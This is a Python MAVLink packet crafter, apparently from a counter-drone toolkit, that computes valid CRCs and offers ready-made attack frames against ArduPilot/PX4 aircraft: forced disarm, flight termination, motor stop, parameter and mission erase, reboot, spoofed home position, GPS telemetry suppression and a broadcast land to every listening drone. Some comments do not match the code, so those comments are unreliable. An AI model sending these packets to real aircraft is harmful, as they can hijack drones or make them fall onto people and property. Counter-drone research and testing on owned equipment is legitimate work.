"""Minimal MAVLink v1/v2 packet crafter.

Implements X.25 (CRC-16/MCRF4XX) CRC with per-message CRC_EXTRA seeds so that
packets generated here are byte-accurate and would be accepted by a real
MAVLink receiver (e.g. ArduPilot / PX4 / MAVProxy).

This is used purely for cUAS simulation and evaluation.
"""
from __future__ import annotations

import struct
from typing import Dict, List, Tuple

MAVLINK_STX_V1 = 0xFE
MAVLINK_STX_V2 = 0xFD

# ---- CRC-16/MCRF4XX (a.k.a. X.25 with reversed polynomial 0x8408) ----
def _crc16_mcrf4xx(data: bytes) -> int:
    crc = 0xFFFF
    for b in data:
        tmp = (b ^ crc) & 0xFF
        tmp = (tmp ^ (tmp << 4)) & 0xFF
        crc = ((crc >> 8) ^ (tmp << 8) ^ (tmp << 3) ^ (tmp >> 4)) & 0xFFFF
    return crc


# ---- CRC_EXTRA seeds for common MAVLink messages ----
# Source: mavlink/message_definitions/v1.0/common.xml (autogenerated seeds)
CRC_EXTRA: Dict[int, int] = {
    0: 50,     # HEARTBEAT
    1: 124,    # SYS_STATUS
    11: 89,    # SET_MODE
    20: 214,   # PARAM_REQUEST_READ
    21: 159,   # PARAM_REQUEST_LIST
    22: 220,   # PARAM_VALUE
    23: 168,   # PARAM_SET
    24: 24,    # GPS_RAW_INT
    30: 39,    # ATTITUDE
    33: 104,   # GLOBAL_POSITION_INT
    39: 254,   # MISSION_ITEM
    73: 38,    # MISSION_ITEM_INT
    76: 152,   # COMMAND_LONG
    77: 143,   # COMMAND_ACK
    109: 51,   # RADIO_STATUS
    111: 138,  # TIMESYNC
    140: 181,  # ACTUATOR_CONTROL_TARGET
    147: 154,  # BATTERY_STATUS
    242: 104,  # HOME_POSITION
    244: 90,   # MESSAGE_INTERVAL
    246: 8,    # ADSB_VEHICLE
    253: 83,   # STATUSTEXT
    # MAV_CMD messages piggy-back on COMMAND_LONG (msgid=76). Handled in payloads.
}

# ---- Known MAV_CMD IDs used by cUAS payloads ----
MAV_CMD = {
    "NAV_LAND": 21,
    "NAV_RETURN_TO_LAUNCH": 20,
    "NAV_TAKEOFF": 22,
    "COMPONENT_ARM_DISARM": 400,
    "DO_SET_MODE": 176,
    "DO_SET_ACTUATOR": 187,
    "DO_FLIGHTTERMINATION": 185,
    "DO_MOTOR_TEST": 209,
    "PREFLIGHT_STORAGE": 245,
    "PREFLIGHT_REBOOT_SHUTDOWN": 246,
    "DO_SET_HOME": 179,
    "SET_MESSAGE_INTERVAL": 511,
    "FLIGHTTERMINATION_DEACTIVATE": 186,
}


def build_command_long_payload(
    target_system: int,
    target_component: int,
    command: int,
    confirmation: int = 0,
    param1: float = 0.0,
    param2: float = 0.0,
    param3: float = 0.0,
    param4: float = 0.0,
    param5: float = 0.0,
    param6: float = 0.0,
    param7: float = 0.0,
) -> bytes:
    """MAVLink COMMAND_LONG payload (msgid=76). Field order per common.xml."""
    return struct.pack(
        "<fffffffHBBB",
        param1, param2, param3, param4, param5, param6, param7,
        command, target_system, target_component, confirmation,
    )


def _truncate_zero_bytes(payload: bytes) -> bytes:
    """MAVLink v2 payload trimming: drop trailing zero bytes (min 1)."""
    while len(payload) > 1 and payload[-1] == 0:
        payload = payload[:-1]
    return payload


def build_packet_v2(
    msgid: int,
    payload: bytes,
    system_id: int = 255,
    component_id: int = 190,
    sequence: int = 0,
    incompat_flags: int = 0,
    compat_flags: int = 0,
) -> bytes:
    """Assemble a MAVLink v2 frame."""
    if msgid not in CRC_EXTRA:
        raise ValueError(f"CRC_EXTRA not registered for msgid={msgid}")
    trimmed = _truncate_zero_bytes(payload)
    header = struct.pack(
        "<BBBBBBB",
        MAVLINK_STX_V2, len(trimmed), incompat_flags, compat_flags,
        sequence, system_id, component_id,
    )
    # msgid is 24-bit little-endian in v2
    msgid_bytes = bytes([msgid & 0xFF, (msgid >> 8) & 0xFF, (msgid >> 16) & 0xFF])
    frame_wo_crc = header[1:] + msgid_bytes + trimmed  # skip STX for CRC per spec
    crc_input = frame_wo_crc + bytes([CRC_EXTRA[msgid]])
    crc = _crc16_mcrf4xx(crc_input)
    return header + msgid_bytes + trimmed + struct.pack("<H", crc)


def build_packet_v1(
    msgid: int,
    payload: bytes,
    system_id: int = 255,
    component_id: int = 190,
    sequence: int = 0,
) -> bytes:
    """Assemble a MAVLink v1 frame (msgid must be <= 255)."""
    if msgid > 255:
        raise ValueError("MAVLink v1 supports msgid <= 255")
    if msgid not in CRC_EXTRA:
        raise ValueError(f"CRC_EXTRA not registered for msgid={msgid}")
    header = struct.pack(
        "<BBBBBBB",
        MAVLINK_STX_V1, len(payload), sequence, system_id, component_id, msgid,
        0,  # placeholder, not used; v1 header is 6 bytes actually
    )
    # v1 header is 6 bytes: STX,LEN,SEQ,SYSID,COMPID,MSGID
    header = bytes([MAVLINK_STX_V1, len(payload), sequence, system_id, component_id, msgid])
    crc_input = header[1:] + payload + bytes([CRC_EXTRA[msgid]])
    crc = _crc16_mcrf4xx(crc_input)
    return header + payload + struct.pack("<H", crc)


def hexdump(data: bytes, width: int = 16) -> List[str]:
    """Return classical hexdump lines: offset | hex | ascii."""
    lines: List[str] = []
    for offset in range(0, len(data), width):
        chunk = data[offset : offset + width]
        hex_bytes = " ".join(f"{b:02X}" for b in chunk).ljust(width * 3 - 1)
        ascii_bytes = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"{offset:04X}  {hex_bytes}  |{ascii_bytes}|")
    return lines


def describe_packet(frame: bytes) -> Dict:
    """Human-readable summary of a MAVLink frame."""
    if not frame:
        return {"valid": False, "reason": "empty"}
    stx = frame[0]
    if stx == MAVLINK_STX_V2 and len(frame) >= 12:
        length = frame[1]
        return {
            "valid": True,
            "version": "v2",
            "stx": f"0x{stx:02X}",
            "payload_length": length,
            "incompat_flags": frame[2],
            "compat_flags": frame[3],
            "sequence": frame[4],
            "system_id": frame[5],
            "component_id": frame[6],
            "message_id": frame[7] | (frame[8] << 8) | (frame[9] << 16),
            "total_bytes": len(frame),
        }
    if stx == MAVLINK_STX_V1 and len(frame) >= 8:
        return {
            "valid": True,
            "version": "v1",
            "stx": f"0x{stx:02X}",
            "payload_length": frame[1],
            "sequence": frame[2],
            "system_id": frame[3],
            "component_id": frame[4],
            "message_id": frame[5],
            "total_bytes": len(frame),
        }
    return {"valid": False, "reason": "unknown STX or short frame"}


# ---- Named packet builders for the payload library ----
def payload_force_land(target_sys: int, target_comp: int = 1, seq: int = 0) -> bytes:
    p = build_command_long_payload(target_sys, target_comp, MAV_CMD["NAV_LAND"])
    return build_packet_v2(76, p, sequence=seq)


def payload_rth(target_sys: int, target_comp: int = 1, seq: int = 0) -> bytes:
    p = build_command_long_payload(target_sys, target_comp, MAV_CMD["NAV_RETURN_TO_LAUNCH"])
    return build_packet_v2(76, p, sequence=seq)


def payload_disarm(target_sys: int, target_comp: int = 1, seq: int = 0) -> bytes:
    # COMPONENT_ARM_DISARM: param1=0 disarm, param2=21196 force
    p = build_command_long_payload(target_sys, target_comp, MAV_CMD["COMPONENT_ARM_DISARM"], param1=0.0, param2=21196.0)
    return build_packet_v2(76, p, sequence=seq)


def payload_flight_termination(target_sys: int, target_comp: int = 1, seq: int = 0) -> bytes:
    # DO_FLIGHTTERMINATION: param1=1 activate
    p = build_command_long_payload(target_sys, target_comp, MAV_CMD["DO_FLIGHTTERMINATION"], param1=1.0)
    return build_packet_v2(76, p, sequence=seq)


def payload_propeller_stop(target_sys: int, target_comp: int = 1, seq: int = 0) -> bytes:
    # DO_MOTOR_TEST: param1=motor#, param2=0 (percent), param3=0 throttle, param4=timeout
    p = build_command_long_payload(target_sys, target_comp, MAV_CMD["DO_MOTOR_TEST"],
                                   param1=1.0, param2=0.0, param3=0.0, param4=1.0)
    return build_packet_v2(76, p, sequence=seq)


def payload_memory_erase(target_sys: int, target_comp: int = 1, seq: int = 0) -> bytes:
    # PREFLIGHT_STORAGE: param1=1 (write to persistent), param2=1 (reset params),
    # param3=1 (reset mission), param4=1 (reset log)
    p = build_command_long_payload(target_sys, target_comp, MAV_CMD["PREFLIGHT_STORAGE"],
                                   param1=2.0, param2=1.0, param3=1.0, param4=1.0)
    return build_packet_v2(76, p, sequence=seq)


def payload_reboot(target_sys: int, target_comp: int = 1, seq: int = 0) -> bytes:
    # PREFLIGHT_REBOOT_SHUTDOWN: param1=1 reboot autopilot
    p = build_command_long_payload(target_sys, target_comp, MAV_CMD["PREFLIGHT_REBOOT_SHUTDOWN"],
                                   param1=1.0, param2=0.0)
    return build_packet_v2(76, p, sequence=seq)


def payload_rth_spoof_home(target_sys: int, target_comp: int = 1, seq: int = 0,
                            lat: float = 0.0, lon: float = 0.0, alt: float = 0.0) -> bytes:
    # Injects a fake HOME_POSITION via DO_SET_HOME then triggers RTH.
    p = build_command_long_payload(target_sys, target_comp, MAV_CMD["DO_SET_HOME"],
                                   param1=0.0, param5=lat, param6=lon, param7=alt)
    return build_packet_v2(76, p, sequence=seq)


def payload_gnss_denial(target_sys: int, target_comp: int = 1, seq: int = 0) -> bytes:
    # SET_MESSAGE_INTERVAL: disable GPS_RAW_INT (id=24) by setting interval=-1
    import struct as _s
    payload = build_command_long_payload(target_sys, target_comp, MAV_CMD["SET_MESSAGE_INTERVAL"],
                                          param1=24.0, param2=-1.0)
    return build_packet_v2(76, payload, sequence=seq)


def broadcast_takedown(seq: int = 0) -> bytes:
    """Broadcast COMMAND_LONG land to target_system=0 (all)."""
    p = build_command_long_payload(0, 0, MAV_CMD["NAV_LAND"])
    return build_packet_v2(76, p, sequence=seq)
